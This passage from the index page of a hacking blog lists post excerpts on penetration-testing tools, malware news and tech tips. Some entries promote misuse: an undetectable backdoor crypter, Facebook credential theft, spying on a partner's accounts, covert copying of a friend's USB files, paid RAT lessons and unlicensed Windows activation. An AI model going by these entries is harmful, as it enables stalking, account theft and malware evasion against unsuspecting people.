repository, change to hellraiser web app directory and run bundle install and bundle exec rake db:migrate. git clone https://github.com/m0nad/HellRaiser/ bundle install bundle exec - [A new mode used by Hackers for phishing](https://who-ami.net/a-new-mode-used-by-hackers-for-phishing/) - PhishLabs security researchers have found a new way of phishing that allows hackers to use the phone-side URL address bar to lead the user into the phishing site. At present, this means has a lot of users in the mobile side of Facebook users have in the move. Researchers revealed that the new attack strategy relied on the mobile browser - [pythem - Penetration Testing Framework](https://who-ami.net/pythem-penetration-testing-framework/) - pforensic: Commands Reference help clear exit/quit show conversations packetdisplay filter Exploit development and Reverse Engineering xploit xploit: Commands Reference help clear exit/quit set decode/encode shellcode search xploit cheatsheet fuzz Brute Force brute Utils geoip decode/encode cookiedecode Source: Github - [NXcrypt: python backdoor framework](https://who-ami.net/nxcrypt-python-backdoor-framework/) - NXcrypt NXcrypt is a polymorphic ‘python backdoors’ crypter written in python by Hadi Mene (h4d3s) . The output is fully undetectable. NXcrypt can inject malicious python file into a normal file with multi-threading system. Run it with superuser’s permissions. NXcrypt output is Fully undetectable. How it work ? Encryption module: NXcrypt add some junkcode. NXcrypt - [Get Facebook password without hacking facebook](https://who-ami.net/how-to-get-facebook-credentials-without-hacking-facebook/) - Note: Article is only for security purpose, don’t use for any illegal purpose and i am not responsible for anything. Sometimes, if you have a bit of skill, a bit of luck, and a bit of social engineering, you can get Facebook credentials. That’s what this tutorial is all about. If you don’t take the - [USB flash drive: Run portable apps](https://who-ami.net/what-to-do-with-your-usb-flash-drive-run-portable-apps/) - What's more portable than a laptop, tablet, or smartphone? Answer: A USB flash drive. We'll show you how to run applications like Firefox, Chrome, OpenOffice, and more, with just your USB flash drive and a host computer. What's more portable than a laptop, tablet, or smartphone? Answer: A USB flash drive. If you want - [Automate Phishing Emails with GoPhish](https://who-ami.net/automate-phishing-emails-with-gophish/) - A simple phishing toolkit created by Jordan Wright. That is a framework that allows the easy management of phishing campaigns. It even handles the malicious web pages that you create. This is available for all OS types and you can grab this tool from github.com. Tutorial Once you have the server set up and you can - [USB flash drive: Scan for malware](https://who-ami.net/what-to-do-with-your-usb-flash-drive-scan-for-malware/) - What do you do when a virus or trojan horse cripples your system? Your favorite security app may have a bootable rescue CD you can use or you can use the free AVG Rescue CD. In part six of "What to do with your USB flash drive," we'll show you how to install it onto - [USB flash drive: Run Linux](https://who-ami.net/what-to-do-with-your-usb-flash-drive-run-linux/) - Download the 32-bit ISO of Ubuntu 11.04 Desktop and the Universal USB Installer. The ISO file is named ubuntu-11.04-desktop-i386.iso and the Universal USB installer is named Universal-USB-Installer-1.8.5.6.exe. Step 2: Double-click on Universal-USB-Installer-1.8.5.6.exe and after accepting the license agreement, select Ubuntu 11.04 from the drop-down list. Browse and select the Ubuntu 11.04 ISO file you just - [Remove USB devices without using Safe Removal](https://who-ami.net/quickly-remove-usb-devices-without-using-safe-removal/) - The proper way to remove USB devices in Windows is to use the Safe Removal option, but it can be a pain. If you have the quick removal policy set for your USB device, you can safely remove it without using Safe Removal. USB devices can be hot-swapped, but their convenience is hindered by their - [Build a USB Drive Pentesting Toolkit](https://who-ami.net/how-to-build-a-usb-drive-pentesting-toolkit/) - On the right side of the menu, we have the option of formatting the USB drive, View, ADD, or Remove distributions. I’m going to assume you have a clean USB drive. Next, we’re going to click the drop-down arrow listed on Yumi’s “Step 2”. As we can see, there are a large number of programs - [Hacking Traffic Lights is Apparently Really Easy](https://who-ami.net/hacking-traffic-lights-is-apparently-really-easy/) - Hacking Traffic Lights is Apparently Really Easy Hacking Internet of Things (IoTs) have become an amazing practice for cyber criminals out there, but messing with Traffic lights would be something more crazy for them. The hacking scenes in hollywood movies has just been a source of entertainment for the technology industry, like we’ve seen traffic - [Secure your website](https://who-ami.net/how-to-secure-your-website/) - Nowadays, websites are necessary for most of the businesses and especially in e-commerce. Every attacker knows that your site holds customers data. You’ve worked hard on your site (and your brand) – so take some time to secure it. You should do the following steps to ensure your website is safe: – The most important - [Run Any Android Apps On Linux](https://who-ami.net/how-to-run-any-android-apps-on-linux-os/) - We all know that Linux is one of the major operating systems for hackers and other professionals, but still many computer users installed Linux on your system as a dual boot. Run any Android application on your Linux based OS. Before we start the tutorial we must have a bit intro of Linux which is - [Spy your girlfriend through android mobile](https://who-ami.net/spy-on-your-boygirl-friends-social-media-accounts-through-your-android-device/) - Note: This ONLY works for rooted phones! What Is Sniffing? “Sniffing” is where a malicious device connected to a network intercepts and logs packets being transferred between an access point and victim’s device. The packets can then be used to impersonate or spoof the victim’s device, allowing the malicious device to access private information. FaceNiff - [Remove a Virus from Android Without a Factory Reset](https://who-ami.net/how-to-remove-a-virus-from-android-without-a-factory-reset/) - Desktops aren’t the only gadgets that can be affected by a virus. Android devices have a malware problem and it’s growing every day. If you do get a virus, you could perform a factory reset to get rid of it, but that means you’d lose all your data — those photos you shot, the saved - [Microsoft: Fireball Malware Isn’t As Dangerous As WannaCry](https://who-ami.net/microsoft-fireball-malware-isnt-as-dangerous-as-wannacry/) - Here’s How To Stay Safe Short Bytes: Microsoft has released some details on the Fireball malware, which was initially reported by Check Point researchers. Microsoft has pointed out that malware’s magnitude of the threat has been overblown. The company has also listed some precautionary methods to help the customers ensure their security. Earlier this month, the security researchers - [New Fileless Ransomware with Code Injection Ability Detected in the Wild](https://who-ami.net/new-fileless-ransomware-with-code-injection-ability-detected-in-the-wild/) - “PsExec can enable attackers to run remotely executed commands, instead of providing and using an entire interactive login session, or manually transferring the malware into a remote machine, like in RDPs,” Trend Micro says. Sorebrect Also Encrypts Network Shares Sorebrect also scans the local network for other connected computers with open shares and locks - [SAM database (Dumping and Cracking the local user accounts)](https://who-ami.net/sam-database-dumping-and-cracking-the-local-user-accounts/) - SAM database (Dumping and Cracking the local user accounts) Let’s talk about the hash crack through post / hashdump and john (john the ripper) of the Metasploit module. Once the meterpreter shell is injected and driven into the target pc, the shell connection is maintained. Get meterpreter session 2. Privilege escalation 3. Use post/windows/gather/hashdump module - [brutespray](https://who-ami.net/brutespray-2/) - Brute-Forcing from Nmap output BruteSpray takes nmap GNMAP/XML output and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap. Installation git clone https://github.com/x90skysn3k/brutespray.git Usage First do an nmap scan with -oG nmap.gnmap or -oX nmap.xml. Command: python brutespray.py -h Command: python brutespray.py -file nmap.gnmap Command: python brutesrpay.py -file - [phpsploit](https://who-ami.net/phpsploit/) - Stealth post-exploitation framework PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes. Overview The obfuscated communication is accomplished using HTTP headers under standard - [NoobSecToolkit](https://who-ami.net/noobsectoolkit/) - (2) git clone https://github.com/krintoxi/NoobSec-Toolkit.git (3) cd NoobSecToolkit/NoobSec-Toolkit/ (4) python NSToolkit.py Toolkit Options: (sqli)SQL Injector (vulscan) Vulnerability Scanner (dinfo) Gather Basic Domain Info (apf) Admin Page Finder (discover) Information Harvester (hashtype) Identify Hash Type (hexconv) Hex encoder and decoder! (converters) Web Converters (dping) DOS/Ping Target For 1,000 Seconds (stegattack) Steghide Dictionary Attacker (steghide) Install, Learn - [chkrootkit](https://who-ami.net/chkrootkit/) - Malware & Rootkit detection on Linux also run this command with the -v option (verbose). Installation On debian/ubuntu, you simple type command sudo apt-get install chkrootkit Usage Open terminal, and type command sudo chkrootkit If there are some Rookit signs after the test, you can try to analyze the same, because some may be - [Using Nessus and Metasploit](https://who-ami.net/using-nessus-and-metasploit/) - Nessus is currently divided into four versions: Nessus Home, Nessus Professional, Nessus Manager, Nessus Cloud. Nessus Home freeware for home users limited for scanning 16 hosts and for non-commercial home use only. It doesn’t support compliance checks (it is written on a site, but as fact it does) or content audits. Nessus Professional can scan - [Sn1per - scan for vulnerabilities (Best)](https://who-ami.net/sn1per-scan-for-vulnerabilities-best/) - ABOUT: Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. DEMO VIDEO FEATURES: Automatically collects basic recon (ie. whois, ping, DNS, etc.) Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers - [Kadimus](https://who-ami.net/kadimus/) - Find & Exploit LFI Vulnerability LFI Scan & Exploit Tool Kadimus is a tool to check sites to lfi vulnerability , and also exploit it Features: Check all url parameters /var/log/auth.log RCE /proc/self/environ RCE php://input RCE data://text RCE Source code disclosure Multi thread scanner Command shell interface through HTTP Request Proxy support (socks4://, - [Browser Exploitation Framework (BeEF)](https://who-ami.net/browser-exploitation-framework-beef/) - In this post, I’ll show you the quickest way to get up and running with BeEF using Kali Linux. Then we’ll explore the basic structure of the program. By the end of the post you should be able to begin using BeEF in your own testing. Installation on Kali is very simple. Since they’ve created - [Installing and Setting up Aircrack-ng for Cracking WiFi Passwords](https://who-ami.net/installing-and-setting-up-aircrack-ng-for-cracking-wifi-passwords/) - I probably don’t have to tell you why a password cracking tool is nice to have. Even more, I shouldn’t have to explain the benefits of hacking WiFi – especially your own. So let’s get straight to it. The tool you want to use here is Aircrack-ng. “Aircrack-ng is a network software suite consisting of - [Pybelt - The Hackers Tool Belt](https://who-ami.net/pybelt-the-hackers-tool-belt/) - SQL Injection scanning made easy, just provide a URL and watch it work You can either clone the repository git clone https://github.com/ekultek/pybelt.git or download the latest release as a zip/tar ball here Once you have the program installed cd into the directory and run the following command: pip install -r requirements.txt This will install all - [Copy/Paste Data Automatically from USB pendrive to your computer](https://who-ami.net/how-to-copypaste-data-automatically-on-insert-of-pendrive-to-your-computer/) - Copy/Paste Data Automatically from USB pendrive to your computer Although this software is Free and easy to use but it has a catch . It doesn’t start automatically when your PC starts which will make trouble when you want to copy file from your friends silently because if you open this software in front of - [CMD commands used in hacking](https://who-ami.net/best-cmd-commands-used-in-hacking/) - net view net use net user ping tracert arp route nbtstat netstat ipconfig In case you don’t know some of them, then just type the command on CMD and hit enter. A little help will show up on your screen. Read it to understand what that particular command does. Let’s start easy… 1) ping : - [How to enable night/dark mode for YouTube](https://who-ami.net/how-to-enable-nightdark-mode-for-youtube/) - Yes you heard it right, after applying this super simple trick you can enjoy Youtube dark mode. Youtube Dark Mode makes it easier for the eyes when watching videos for long periods of time. How to enable night/dark mode for YouTube Yes you heard it right, after applying this super simple trick you can - [How to turn of any android phone remotly by sending SMS](https://who-ami.net/how-to-turn-of-any-android-phone-remotly-by-sending-sms/) - Android phone is having lots of abilities and most important is you can add more features or your own built one. Rooting android phone increases its features beyond the limit. There are many after rooting tricks available for almost any android device. People are often interested in hacking or spying tricks and android is not - [Warning: Anyone Can Recover Deleted Files From Your USB Drives and External SSDs](https://who-ami.net/warning-anyone-can-recover-deleted-files-from-your-usb-drives-and-external-ssds/) - It’s common wisdom that deleted files can’t be recovered from solid-state media, only from traditional mechanical hard drives. But this only applies to internal drives — USB flash drives and external solid-state drives are vulnerable to file-recovery attacks. Don’t just take our word for it. You can test this for yourself. Grab a USB flash - [KSN Report: Ransomware in 2016-2017](https://who-ami.net/ksn-report-ransomware-in-2016-2017/) - This report has been prepared using depersonalized data processed by Kaspersky Security Network (KSN). The metrics are based on the number of distinct users of Kaspersky Lab products with the KSN feature enabled, who encountered ransomware at least once in a given period, as well as research into the ransomware threat landscape by Kaspersky Lab - [Most commonly Used Linux Commands](https://who-ami.net/most-commonly-used-linux-commands/) - Most commonly Used Linux Commands Basic linux commands with examples Processor type, etc., Sample uname output from a Ubuntu laptop is shown below. $ uname -a Linux john-laptop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:12:52 UTC 2010 i686 GNU/Linux whereis command examples When you want to find out where a specific Unix command exists (for example, - [Critical Vulnerability In Skype](https://who-ami.net/critical-vulnerability-in-skype/) - to execute own malicious codes. The Skype software is using a dll in case of a copy request on the local system. We place a picture in our clipboard (we take a screenshot in this example), this needs to be copied from a remote desktop system. This can be pasted into the local Skype message - [Kali Linux can now run in a browser](https://who-ami.net/kali-linux-can-now-run-in-a-browser/) - Kali Linux can now run in a browser Specially for hackers : You can now run Kali Pentesting OS in your web browser This bit of news is going to elate hackers and security researchers. Kali Linux is one of the most loved distros by the security community and it is now coming to - [All the Terms Of Hacking](https://who-ami.net/all-the-terms-of-hacking/) - Common Terms Of Hacking World 1#DDoS: DDoS means Distributed Denial of Service. This is a type of DOS attack in which multiple compromised systems are used and these systems are often infected with a Trojan. All these infected systems select a target and cause a Denial of Service (DoS) attack. 2# VPS: It stands for Virtual private server (VPS) . It is a - [Microsoft Windows 10 has a keylogger enabled by default](https://who-ami.net/microsoft-windows-10-keylogger-enabled-default/) - 2. Turn off Send Microsoft info about how I write to help us improve typing and writing in the future. If this was ever on while you used Windows 10, there’s no way for you to know that Microsoft has deleted your information. They promise to disassociate their copy of your keystroke history from your identity, - [apt-get commands and examples](https://who-ami.net/apt-get-commands-and-examples/) - --fix-missing Ignore missing packages; if packages cannot be retrieved or fail the integrity check after retrieval (corrupted package files), hold back those packages and handle the result. Use of this option together with -f may produce an error in some situations. If a package is selected for installation (particularly if it is mentioned on the command line) - [Microsoft Windows SMB Server Remote Code Execution Vulnerability ( CVE-2017-1178 )](https://who-ami.net/microsoft-windows-smb-server-remote-code-execution-vulnerability-cve-2017-1178/) - Windows SMB Server Remote Code Execution Vulnerability ( CVE-2017-1178 ) October 10, 2017, Microsoft released the latest patch, one of the serious vulnerability patch release, the vulnerability for Microsoft’s Windows operating system SMB protocol remote code execution vulnerability, CVE number CVE-2017-11780. The vulnerability level is high. A number of system versions that affect Windows 7 to Windows - [Security Cheat Sheets for Penetration Testing](https://who-ami.net/security-cheat-sheets-for-penetration-testing/) - Security cheat sheets for Penetration Testing by sniferl4bs. This cheat sheet is especially for penetration testers/CTF participants/security enthusiasts. Download and Extract Command: wget https://github.com/Snifer/security-cheatsheets/archive/master.zip unzip master.zip Contents: aircrack-ng airport burp cewl cidr cookies dig fierce ftp golismero hping http https-ssl-tls hydra john maltego markdown medusa metasploit msfvenom mysql ncat nessus nikto nmap nping permissions php pivoting - [About Blueborne !](https://who-ami.net/about-blueborne/) - The latest Bluetooth vulnerability With the number of smart, connected devices on the rise, so are concerns about online privacy and security, especially with the spate of ransomware and other malware attacks dominating the headlines over the past year. Even as the world is trying to recover from the WannaCry ransomware, the Mirai botnet and - [Tips to prevent black hat hackers](https://who-ami.net/tips-to-prevent-black-hat-hackers/) - Hacking incidents are increasing day by day in the 21st century. The Internet has the maximum risks nowadays. Sometimes you don’t know how your bad practices invite a hacker to you which can know all your credit card details, messages, OTPs etc. Today, I will talk about some bad practices you should avoid which can - [Petya Ransomware Spreading Rapidly Worldwide, Just Like WannaCry](https://who-ami.net/petya-ransomware-spreading-rapidly-worldwide-just-like-wannacry/) - Watch out, readers! It is ransomware, another WannaCry, another wide-spread attack. The WannaCry ransomware is not dead yet and another large scale ransomware attack is making chaos worldwide, shutting down computers at corporates, power supplies, and banks across Russia, Ukraine, Spain, France, UK, India, and Europe and demanding $300 in bitcoins. According to multiple sources, - [Restore Deleted /tmp Directory in Linux](https://who-ami.net/restore-deleted-tmp-directory-in-linux/) - The /tmp directory contains mostly files that are required temporarily, it is used by different programs to create lock files and for temporary storage of data. Many of these files are important for currently running programs and deleting them may result in a system crash. On all if not most Linux systems, the contents of - [Hacking a Website](https://who-ami.net/hacking-a-website/) - I will explain the fourth point, that you should be expert in removing traces, in my future articles. Traces are very important. Please don’t ignore them or you will experience a lot of problems. Keep reading, or simply subscribe to our posts. METHODS OF HACKING WEBSITE: 1. SQL INJECTION 2. CROSS SITE SCRIPTING 3. REMOTE FILE - [KRACK : Critical Key Reinstallation Attack Against Widely-Used WPA2 Wi-Fi Protocol](https://who-ami.net/krack-critical-key-reinstallation-attack-widely-used-wpa2-wi-fi-protocol/) - However, there's no need to panic, as you aren't vulnerable to just anyone on the internet because a successful exploitation of KRACK attack requires an attacker to be within physical proximity to the intended WiFi network. WPA2 Vulnerabilities and their Brief Details The key management vulnerabilities in the WPA2 protocol discovered by the researchers has - [How to Update Router Firmware](https://who-ami.net/update-router-firmware/) - How to Update Router Firmware Updating your router firmware can help improve connectivity and keep your router secure. It is always recommended to install the latest available updates to keep your network safe and efficient. Most routers have a built-in update checker, which may or may not perform the entire process automatically. If you're using - [Nmap Cheatsheet](https://who-ami.net/nmap-cheatsheet/) - Nmap Cheatsheet Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine to scan single hosts. nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) - [This script tests if APs are affected by CVE-2017-13082 (KRACK attack)](https://who-ami.net/script-tests-aps-affected-cve-2017-13082-krack-attack/) - This script tests if APs are affected by CVE-2017-13082 (KRACK attack). See the KRACK attack website for details and also read the research paper. CVE-2017-13082: Key Reinstall in FT Handshake (802.11r) Access Points (APs) might contain a vulnerable implementation of the Fast BSS Transition (FT) handshake. More precisely, a retransmitted or replayed FT Reassociation Request may trick - [Bios password reset](https://who-ami.net/bios-password-reset/) - Bios password reset This is an overview of the algorithms that I looked at so far: Vendor Hash Encoding Example of Hash Code/Serial Scripts Asus Machine Date 01-01-2011 pwgen-asus.py Compaq 5 decimal digits 12345 pwgen-5dec.py Windows binary Fujitsu-Siemens 5 decimal digits 12345 pwgen-5dec.py Windows binary Fujitsu-Siemens 8 hexadecimal digits DEADBEEF pwgen-fsi-hex.py Windows binary - [XSStrike ( Bruteforce Parameters for XSS )](https://who-ami.net/xsstrike-bruteforce-parameters-for-xss/) - XSStrike is inspired from BruteXSS and Intellifuzzer-XSS. Download XSStrike - [RED HAWK (An All In One Information Gathering Tool)](https://who-ami.net/red-hawk-an-all-in-one-information-gathering-tool/) - RED HAWK is An All In One Tool For Information Gathering, SQL Vulnerability Scanning and Crawling.Coded In PHP Features Of The Tool: Server detection Cloudflare detector robots scanner CMS Detector WordPress Joomla Drupal Magento Whois GEO-IP Scan NMAP Port Scan DNS Lookup SubNet Calculator Subdomain Finder Reverse IP Scanner CMS detection For Sites On - [1Password Will Give You $100,000 If You Can Crack Its Vault](https://who-ami.net/1password-will-give-you-100000-if-you-can-crack-its-vault/) - AgileBits, the developer behind 1password is ready to pay you a bug bounty of $100,000 if you can break into their vault nd obtain a plain text file of “bad poetry.” Earlier, a “capture the flag” bug bounty like this has a mere $25,000. Even though that sum is quite high when it comes to - [How to install nvidia drivers in Kali Linux](https://who-ami.net/install-nvidia-drivers-kali-linux/) - How to install nvidia drivers in Kali Linux NVIDIA Driver Install First of all I'm assuming being logged in under root and a clean install of kali 2017.2. Pre-requisites nano /etc/apt/sources.list Ensure that sources.list ONLY has the following source: deb http://http.kali.org/kali kali-rolling main contrib non-free 1. Grab the packages you need apt-get update apt-get - [BlueBorne Scanner](https://who-ami.net/blueborne-scanner/) - BlueBorne Scanner Step 1: Install BlueBorne Android Scanner & Dependencies Open terminal and Grab the Script on GitHub by hit: git clone https://github.com/hook-s3c/blueborne-scanner.git cd blueborne-scanner pip install -r ./requirements.txt Step 2: Allow Permissions on the Blueborne directory set permission the programs to execute. sudo chmod +x ./bluebornescan.py Step 3: Turn On Bluetooth Service On Kali - [BlueBorne Android Exploit](https://who-ami.net/blueborne-android-exploit/) - BlueBorne Android Exploit This repository contains a PoC code of BlueBorne’s Android RCE vulnerability (CVE-2017-0781). It also uses the SDP Information leak vulnerability (CVE-2017-0785) to bypass ASLR. It achieves code execution on a Google Pixel Android smartphone running version 7.1.2 with Security Patch Level July or August 2017. This code can also be altered a - [What is a RAT](https://who-ami.net/what-is-a-rat/) - What is a Remote Administration Tool (RAT)? Ever felt like your computer was possessed? Or that you aren’t the only one using your tablet? I think I smell a rat. Literally, a RAT. A RAT or remote administration tool, is software that gives a person full control a tech device, remotely. The RAT gives the - [Rat Lesson](https://who-ami.net/rat-lesson/) - ONE OF THE BEST RAT LESSON ON THE INTERNET NO leaking of the teaching styles/methods used in the lesson. I have the right to change these terms without warning. [/showhide] BUY BASIC PLAN NOW BUY INTERNAL PLAN NOW BUY SUPER PLAN NOW How will the lesson flow ? After you choose your plan you have - [How to activate Windows 10 for free?](https://who-ami.net/how-to-activate-windows-10-for-free/) - How to activate Windows 10 for free? Activate windows 10 without a product key Activating Windows without a product key usually requires you to use a Windows Activator. Using a Windows Activator without owning a legitimate copy of Windows isn’t legal. On the other side, activating Windows without a digital license or product key is free. So - [How to check your Windows 10 Build & Version](https://who-ami.net/how-to-check-your-windows-10-build-version/) - Check Windows 10 Build & Version Many Windows 10 users have no idea what Windows build and version they have. In fact, most consumers likely do not know, and that is an OK thing. Windows 10 should be transparent, and users should not have to know the exact build of the OS they are running. - [How does Cloudflare work?](https://who-ami.net/how-does-cloudflare-work/) - Cloudflare protects and accelerates any website online. Once your website is a part of the Cloudflare community, its web traffic is routed through our intelligent global network. We automatically optimize the delivery of your web pages so your visitors get the fastest page load times and best performance. We also block threats and limit abusive - [How to Create a Cloudflare account and add a website](https://who-ami.net/how-to-create-a-cloudflare-account-and-add-a-website/) - Signing up for Cloudflare is incredibly easy and takes less than 5 minutes. This article outlines the steps to successfully create an account and add your first website. Create an account and add a website Go to www.cloudflare.com and click the Sign up link at the top of the page. Create a Cloudflare account by typing your email address and password. - [How to Find the real IP address of a website behind Cloudflare](https://who-ami.net/how-to-find-the-real-ip-address-of-a-website-behind-cloudflare/) - Cloudflare and other reverse proxy services can make websites faster and safer. One of the benefits of these services is that they add a layer of anonymity to mask a website's hosting provider and other details. By using a reverse proxy service, it can be very difficult or even impossible for someone on the outside to - [Mimir: OSINT Threat Intel Interface](https://who-ami.net/mimir-osint-threat-intel-interface/) - Mimir OSINT Threat Intel Interface – Named after the old Norse God of knowledge. Mimir functions as a CLI to HoneyDB which in short is an OSINT aggregative threat intel pool. Starting the program brings you to a menu the options for which are as follows. 1. Fetch Threat Feed 5. Visualize Top Malicious Hosts in Browser 2. Fetch - [IntRec-Pack v1.3 releases: Intelligence and Reconnaissance Package](https://who-ami.net/intrec-pack-v1-3-releases-intelligence-and-reconnaissance-package/) - IntRec-Pack Intelligence and Reconnaissance Package/Bundle installer. IntRec-Pack is a Bash script designed to download, install and deploy several quality OSINT, Recon and Threat Intelligence tools. Due to the fact it manages the installation of the various dependencies related to these programs as well, it aims to be a comprehensive assistant in setting up your intelligence gathering - [PhoneInfoga v1.0.0 releases: Information gathering](https://who-ami.net/phoneinfoga-v1-0-0-releases-information-gathering/) - PhoneInfoga Information gathering & OSINT reconnaissance tool for phone numbers. One of the most advanced tools to scan phone numbers using only free resources. The goal is to first gather basic information such as country, area, carrier and line type on any international phone numbers with very good accuracy. Then try to determine the VoIP provider or - [ATSCAN SCANNER v16.0.2 released: Advanced Search & Mass Exploit Scanner](https://who-ami.net/atscan-scanner-v16-0-2-released-advanced-search-mass-exploit-scanner/) - ATSCAN SCANNER Advanced Search / Dork / Mass Exploitation Scanner Description Search engine Google / Bing / Ask / Yandex / Sogou● Mass Dork Search● Multiple instant scans.● Mass Exploitation● Use proxy.● Random user agent.● Random engine.● Extern commands execution.● XSS / SQLI / LFI / AFD scanner.● Filter wordpress and Joomla sites on the server.● Find - [Nmap-parse-output v1.4.4 releases: Converts/manipulates/extracts data from a nmap scan output](https://who-ami.net/nmap-parse-output-v1-4-4-releases-converts-manipulates-extracts-data-from-a-nmap-scan-output/) - nmap-parse-output Converts/manipulates/extracts data from a nmap scan output. Changelog v1.4.4 Fixed bug in bash completion when installing system-wide Improved documentation Download git clone https://github.com/ernw/nmap-parse-output.git Examples Write HTML output to scan.html: $ ./nmap-parse-output scan.xml html > scan.html Generates a list of all HTTP(s) ports: $ ./nmap-parse-output scan.xml http-ports http://192.168.0.1:8081 https://192.168.0.1:8443 List all names of detected services and get a list of - [aleph v2.3.6 releases: find the people and companies](https://who-ami.net/aleph-v2-3-6-releases-find-the-people-and-companies/) - Aleph is a tool for indexing large amounts of both documents (PDF, Word, HTML) and structured (CSV, XLS, SQL) data for easy browsing and search. It is built with investigative reporting as a primary use case. Aleph allows cross-referencing mentions of well-known entities (such as people and companies) against watchlists, e.g. from prior research or public datasets. - [bscan: an asynchronous target enumeration tool](https://who-ami.net/bscan-an-asynchronous-target-enumeration-tool/) - bscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure. was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed. - [PenTesters Framework(PTF) v2.2 released](https://who-ami.net/pentesters-frameworkptf-v2-2-released/) - As a penetration tester, I know that you usually choose to use Kali Linux like penetration testing distribution. Kali Linux is a powerful distribution. It includes many, many pentesting tools. If you are Ubuntu/ Linux Mint users, you love the simple, easy-to-use and friendly-GUI of them, but you still want to conduct your penetration testing on your - [Nightcall: Automated Enumeration Script for Pentesting](https://who-ami.net/nightcall-automated-enumeration-script-for-pentesting/) - Nightcall Automated enumeration script built to reduce repetitive tasks during large network pentests. Initial host discovery performed by basic throttled masscan, followed by service enumeration of each host, full port if host count less than a preconfigured constant, top port count otherwise. Nmap outputs are then parsed and common tooling queued up for follow up enumeration - [Mac-ages: MAC address age tracking](https://who-ami.net/mac-ages-mac-address-age-tracking/) - MAC Address Age Tracking This repository is used to determine an approximate issuance date for IEEE allocated hardware address ranges. The dataset was bootstrapped using a combination of the DeepMAC and Wireshark archives and maintained via daily pulls from the IEEE website. Usage If you would like to use the MAC address age dataset in your application, download regular - [Goscan v2.3 releases: Interactive Network Scanner](https://who-ami.net/goscan-v2-3-releases-interactive-network-scanner/) - GoScan GoScan is an interactive network scanner client, featuring auto-complete, which provides abstraction and automation over nmap. It can be used to perform host discovery, port scanning, and service enumeration in situations where being stealthy is not a priority, and time is limited (think of CTFs, OSCP, exams, etc.). GoScan supports all the main steps of network - [OWASP ZAP w2019-02-18 released: pentesting tool for finding vulnerabilities in web applications](https://who-ami.net/owasp-zap-w2019-02-18-released-pentesting-tool-for-finding-vulnerabilities-in-web-applications/) - The OWASP Zed Attack Proxy (ZAP) is easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful - [DarkSpiritz v2.0 releases: penetration testing framework for Linux, MacOS, and Windows systems](https://who-ami.net/darkspiritz-v2-0-releases-penetration-testing-framework-for-linux-macos-and-windows-systems/) - What is DarkSpiritz? Created by the SecTel Team it was a project of one of the owners to update and clean-up an older pentesting framework he had created to something updated and modern. It is a revamp of the very popular framework known as “Roxysploit”. You may be familiar with this framework and if you - [XSS Chef: generating custom XSS payloads](https://who-ami.net/xss-chef-generating-custom-xss-payloads/) - What is XSS Chef? XSS Chef is a small React.js application inspired by CyberChef, which provides users with a modular way to build JavaScript payloads to typically be used during penetration tests to demonstrate cross-site scripting vulnerabilities. A live copy of the application can be found here. What Can I Do with XSS Chef? The current set of recipes - [Hasherbasher: SQL injection via bruteforced MD5 hash reflection of random strings](https://who-ami.net/hasherbasher-sql-injection-via-bruteforced-md5-hash-reflection-of-random-strings/) - hasherbasher This is a tool used to help exploit poorly designed authentication systems by locating ASCII strings that when MD5 hashed, result in raw bytes that could change SQL logic. How It Works When constructing SQL queries for authentication, if a prepared statement is not used – a user can perform a SQL injection attack. For example: - [Sn1per v6.1 releases: Automated Pentest Recon Scanner](https://who-ami.net/sn1per-v6-1-releases-automated-pentest-recon-scanner/) - Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting add-on for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to https://xerosecurity.com. FEATURES: Automatically - [Evil Clippy v1.1 Releases](https://who-ami.net/evil-clippy-v1-1-releases/) - Evil Clippy v1.1 releases: hide VBA macros, stomp VBA code and confuse macro analysis tools Evil Clippy A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX, and Windows. This tool was released during our BlackHat Asia talk (March - [Interlace v1.3.3 Releases](https://who-ami.net/interlace-v1-3-3-releases/) - Interlace Easily turn single threaded command line applications into a fast, multi-threaded application with CIDR and glob support. Install git clone https://github.com/codingo/Interlace.gitpython3 setup.py install Usage Further information regarding ports (-p) Further information regarding targets (-t or -tL) Both -t and -tL will be processed the same. You can pass targets the same as you would when using nmap. This can be done - [mitm6 v0.2.2 Releases](https://who-ami.net/mitm6-v0-2-2-releases/) - mitm6 v0.2.2 releases: pwning IPv4 via IPv6 mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attackers host as default DNS server. As DNS server, mitm6 will selectively reply - [How to bypass UAC in newer Windows Versions](https://who-ami.net/how-to-bypass-uac-in-newer-windows-versions/) - What is UAC? UAC (User Account Control) is a security feature, introduced from Windows 7 and onward versions of Windows. This prevents that even a local administrator account can’t execute changes to operating system, unless the user specifically chooses to. It is very common to see desktop users working with Administrators account (not recommended, but - [AWS Security tools: Scripts and tools for AWS Pentest](https://who-ami.net/aws-security-tools-scripts-and-tools-for-aws-pentest/) - AWS Security tools Bunch of scripts for AWS Pentest lambda/lambda_dumper.py – Script to Dump AWS Lambda functions lambda/lambda_backdoor.py – Backdoor AWS users iam/iam_user_enum – Bruteforce IAM usernames iam/assume_role_enum – Enumerate and Assume IAM Roles for privilege escalation eks/k8s_secrets_dumper.py – Kubernetes Secrets Dumper eks/pod_to_node_escape – Escape form k8s pod to the underlying container Download & Install git clone - [Hackers bypassed Galaxy S10 ultrasonic biometric fingerprint 